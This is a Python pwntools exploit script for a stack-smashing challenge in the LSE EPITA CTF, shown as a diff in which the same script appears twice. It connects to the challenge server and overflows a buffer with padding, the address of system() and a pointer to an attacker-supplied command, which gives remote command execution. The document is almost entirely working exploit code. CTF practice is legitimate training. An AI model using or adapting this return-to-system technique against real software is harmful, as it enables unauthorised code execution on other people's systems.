0xPwny · March 13, 2017 10:09
diff --git a/pwn100.py b/pwn100.py
 #!/usr/bin/python

 #Author : Abdeljalil Nouiri
 #exploit For LSE EPITA CTF : Smash Stack 100pts


 from pwn import *
 import sys

 cmd = 0x8049dc8
 system = 0x08048500

 puts = 0x080484f0
 putsGOT = 0x08049d68

 #con = process("./pwn100")
 con = remote("lse.epita.fr",52114)

 #print util.proc.pidof(con)
 #raw_input("Attach ..")


 con.recvuntil("User name :")
 con.sendline(sys.argv[1]) # "cat flag.txt"

 con.recvuntil("Action:")

 payload = "1"
 payload += "A"*35
 payload += p32(system)
 payload += p32(0x42424242)
 payload += p32(cmd)

 con.sendline(payload)
 print con.recv()
 print con.recv()
 print con.recv()
 print con.recv()
	#!/usr/bin/python

	#Author : Abdeljalil Nouiri
	#exploit For LSE EPITA CTF : Smash Stack 100pts


	from pwn import *
	import sys

	cmd = 0x8049dc8
	system = 0x08048500

	puts = 0x080484f0
	putsGOT = 0x08049d68

	#con = process("./pwn100")
	con = remote("lse.epita.fr",52114)

	#print util.proc.pidof(con)
	#raw_input("Attach ..")


	con.recvuntil("User name :")
	con.sendline(sys.argv[1]) # "cat flag.txt"

	con.recvuntil("Action:")

	payload = "1"
	payload += "A"*35
	payload += p32(system)
	payload += p32(0x42424242)
	payload += p32(cmd)

	con.sendline(payload)
	print con.recv()
	print con.recv()
	print con.recv()
	print con.recv()